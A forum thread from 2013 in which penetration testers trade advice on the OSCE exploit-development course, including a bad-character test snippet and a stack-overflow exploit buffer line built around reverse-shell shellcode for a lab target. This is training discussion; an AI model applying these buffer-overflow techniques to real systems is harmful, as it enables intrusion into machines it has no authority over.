.

OSCE advice?

<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Wed Feb 06, 2013 9:56 pm

Re: OSCE advice?

DragonGorge wrote:Well, like I said, after OSCP I took a hiatus to decompress. Time flies I guess.

How'd it go BTW? Did you write a review?


Totally understandable; I was just teasing :)

I'm way behind on a lot of reviews I want to write. The next 4-6 weeks are insane for me, so it'll be a bit longer still. I'll definitely post a link here when I have a chance to get to it though.

Suffice to say, it was both the most challenging and rewarding cert I've done.



MaXe, how many shells do you have from all of us opening those Intern0t PDFs?
The day you stop learning is the day you start becoming obsolete.
<<

Dark_Knight

User avatar

Sr. Member
Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Wed Feb 06, 2013 11:20 pm

Re: OSCE advice?

ajohnson wrote:@DK: I assume you're not sending the shellcode because it doesn't make it there. Otherwise, that would be your first problem ;D

You haven't got all the bad characters out, and even after that, you're not jumping back far enough. You'll currently land in the middle of the shellcode once you correct the characters.

x = ''
for i in range(0, 256):
   x += "\\x%02x" % i
print x

will give you a list of all 256 hex bytes. To start, use that as your shellcode and just keep sending longer and longer lines until it doesn't work, and then strip out a character. I put a break point at the beginning of your jump back and then compared the bytes that were present with what I sent. You could also automate that with pydbg if you're feeling ambitious. There's an example in the courseware.


I seem to be missing something as it relates to jumping back into the stack. Currently I am jumping back approx. 512 bytes. I tried jumping back further but then I jump out of my allocated buffer.

Any help as it relates to jumping back?? Thats where I am having the problem..
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Thu Feb 07, 2013 12:03 am

Re: OSCE advice?

DragonGorge wrote:
ajohnson wrote:Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks. ;)

I put a very intense 4-6 months into the OSCE, so it's not like I just breezed through it.

Well, like I said, after OSCP I took a hiatus to decompress. Time flies I guess.

How'd it go BTW? Did you write a review?


No, but I did:
https://forum.intern0t.org/blogs/maxe/9 ... art-1.html

https://forum.intern0t.org/blogs/maxe/1 ... art-2.html
https://forum.intern0t.org/blogs/maxe/1 ... art-3.html
https://forum.intern0t.org/blogs/maxe/1 ... art-4.html

ajohnson wrote:

MaXe, how many shells do you have from all of us opening those Intern0t PDFs?


A couple of thousand, people that appreciated reading them :-) I don't put bad stuff in my papers, code, pocs, etc.
(Some of them may have very basic anti script kiddie measures, but it's as simple as finding the field where I wrote: you have to uncomment this line or the script won't work.)
I'm an InterN0T'er
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Thu Feb 07, 2013 12:35 am

Re: OSCE advice?

Dark_Knight wrote:I seem to be missing something as it relates to jumping back into the stack. Currently I am jumping back approx. 512 bytes. I tried jumping back further but then I jump out of my allocated buffer.

Any help as it relates to jumping back?? Thats where I am having the problem..


I put a break point at the beginning of the piece that jumps back and then stepped through it. After it actually made the jump, I was in the middle of the shellcode I used after all the Bs. This is how I went about it with what you already had, so maybe we're going about it in a different manner?

  Code:
expl = "\x41" * 1271 + "\x42" * (517-len(shell_reverse_tcp)) + shell_reverse_tcp + jmp_esp + "\x90" * 50 + jmp_back + "\x90" * 361


I'd just start your jmp_back code with a break point, step through it, and see where you end up. I'm also on a different SP as I had to change the jmp esp value, so maybe there are other variables in play. When in doubt, break and step.

MaXe wrote:A couple of thousand, people that appreciated reading them :-) I don't put bad stuff in my papers, code, pocs, etc.
(Some of them may have very basic anti script kiddie measures, but it's as simple as finding the field where I wrote: you have to uncomment this line or the script won't work.)


Yea, they're great. I definitely referred to the AV bypass one as I was going through the course.
The day you stop learning is the day you start becoming obsolete.
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Feb 07, 2013 10:30 am

Re: OSCE advice?

MaXe and ajohnson, you are both gold mines!!!

Now I have a ton of things to read and practice.  :)

BTW, do you guys know where I can get a WinXP VM that I can use in my lab? I am running a AMD64 Linux machine at home...

Thx
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

UNIX

User avatar

Hero Member
Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Thu Feb 07, 2013 10:37 am

Re: OSCE advice?

<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Feb 07, 2013 11:36 am

Re: OSCE advice?


Great thanks UNIX! You too (and many more here) are a gold mine!!  :D

I have also found this http://www.mydigitallife.info/how-to-convert-and-import-vhd-to-vmdk-vmware/ to convert these VHD to VMWare VMDK format.

Update: The last step: http://hacktolive.org/wiki/Using_VMware_images_%28.vmdk_files%29
Last edited by caissyd on Fri Feb 08, 2013 10:52 am, edited 1 time in total.
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

DragonGorge

User avatar

Jr. Member
Jr. Member

Posts: 86

Joined: Wed Feb 08, 2012 6:30 pm

Post Thu Feb 07, 2013 5:43 pm

Re: OSCE advice?


First off...I had to read the beginning of your review/blog twice...you took OSCE not having taken the OSCP?!?!  :o Whoa! I have to give you the Wayne's World "We're not worthy" bow.

Great review. One thing I noticed was that the writing in the beginning differed from the end which seemed much more frenetic - I attributed it to an abuse of Red Bull that Offsec seems to demand. Could also be all those exploded brain cells from the class/exam. :)

Also, noticed the line "I passed and nothing could ruin my mood. Ex was whining, angry customers, and heaps more bad stuff going on...." Earlier you wrote "my girlfriend understood me...." Couldn't help but wonder if the "ex" status was attributable to the OSCE. I know my SO was more than fed up by the end of the OSCP.

Again, great review.
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Thu Feb 07, 2013 9:46 pm

Re: OSCE advice?

Indeed I did DragonGorge, and it was also my first course and certification I had ever taken, plus I don't have any lengthy education, or for that sake, a long history of relevant business experience. (Of course, as I am a community guy, I've been in the hacking world for a long time.)

Yea, during the course and the certification it became increasingly harder, hence the reason the writing style changed to display my frustration  ;D
I'd say it's exploded brain cells, it was nice to be in several scenarios where you have to think outside the box and come up with clever solutions  :)

Well, in the beginning she said she understood I had to study most evenings where I could be at her place 10pm or so. After a couple of weeks the whining began, but during the actual exam I had specifically told no whining as I will lose concentration completely, she respected that and I am glad she did.

Afterwards though, she began to whine again but that day when I got the email, nothing could as previously said, ruin my mood. Passing a certification is just a great feeling when it's been a long and hard journey.

The reason she became my ex, was not related to OSCE, even though it could've been a cool story  ;D "The only certification that will make your wife or girlfriend leave you" xD (I broke up with her, as I realised I now had OSCE and didn't need a girlfriend, jk, it was for other personal reasons  ;D In short, she was bad for me (I know that most women complain about a lot of things (because it's socially accepted in most cultures), but this one was over level 9000), but it's the kind of bad that feels a little good hehe )

Thanks for the feedback / response, I enjoyed writing it :-)
I'm an InterN0T'er
<<

cd1zz

User avatar

Recruiters
Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Feb 07, 2013 11:32 pm

Re: OSCE advice?

@H1t M0nk3y

OSCE is hard. Best advice I can give looking back is to simply practice. I used to go to exploit db, pull down exploits, strip out all the stuff in the middle and start with a simple crash. From there, rebuild the exploit. If you do that 100 times, you're in good shape :)

The course material is merely supplemental to what's needed for the exam, assuming you have no experience prior. Go for it though, even if you fail, keep going because it's really really good stuff. You'll eventually get it.
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Fri Feb 08, 2013 9:07 am

Re: OSCE advice?

cd1zz wrote:@H1t M0nk3y

OSCE is hard. Best advice I can give looking back is to simply practice. I used to go to exploit db, pull down exploits, strip out all the stuff in the middle and start with a simple crash. From there, rebuild the exploit. If you do that 100 times, you're in good shape :)

The course material is merely supplemental to what's needed for the exam, assuming you have no experience prior. Go for it though, even if you fail, keep going because it's really really good stuff. You'll eventually get it.


Great advice, there.  Sums it all up, nicely.  Even IF you fail the first time (MOST but not all of us did), it opens your eyes, and you'll definitely nail it on a second go, because you'll be confident.  But if you follow cd1zz, ajohnson and MaXe's advice, you'll do well.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Fri Feb 08, 2013 9:14 am

Re: OSCE advice?

Thank you all for these great advice.

I have a pretty good idea now about what to do for exploit development. But what about the web apps and the network sections? Any advice on these two topics?
Last edited by caissyd on Fri Feb 08, 2013 10:04 am, edited 1 time in total.
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

UNIX

User avatar

Hero Member
Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Fri Feb 08, 2013 9:39 am

Re: OSCE advice?

The sections about web application and network security are rather short, as the focus of the CTP course lies within application security. Being a web developer you already have a good background, so I'd just recommend to play around with some of the many available vulnerable VMs, if you want some further practice. If you haven't already read it, I'd also recommend The Web Application Hacker's Handbook in order to get a good overview on the subject.

In terms of the network security section, you could look into something like GNS3.
<<

lepke

User avatar

Newbie
Newbie

Posts: 2

Joined: Tue Jul 09, 2013 9:53 am

Post Thu Jul 11, 2013 11:06 am

Re: OSCE advice?

It appears I am a little late to the party however, as an aspiring OSCE I just wanted to say thanks for the wealth of great information. I begin the course on 7/27, so this information will undoubtedly come in handy!
<<

superkojiman

User avatar

Jr. Member
Jr. Member

Posts: 81

Joined: Thu Sep 20, 2012 9:42 pm

Post Thu Jul 11, 2013 12:49 pm

Re: OSCE advice?

lepke wrote:It appears I am a little late to the party however, as an aspiring OSCE I just wanted to say thanks for the wealth of great information. I begin the course on 7/27, so this information will undoubtedly come in handy!


I just finished the course a couple of weeks ago and I'm waiting to take the exam now. You'll definitely have lots of fun. As with OSCP, be prepared to do your own research.
OSCP + OSCE
PreviousNext

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software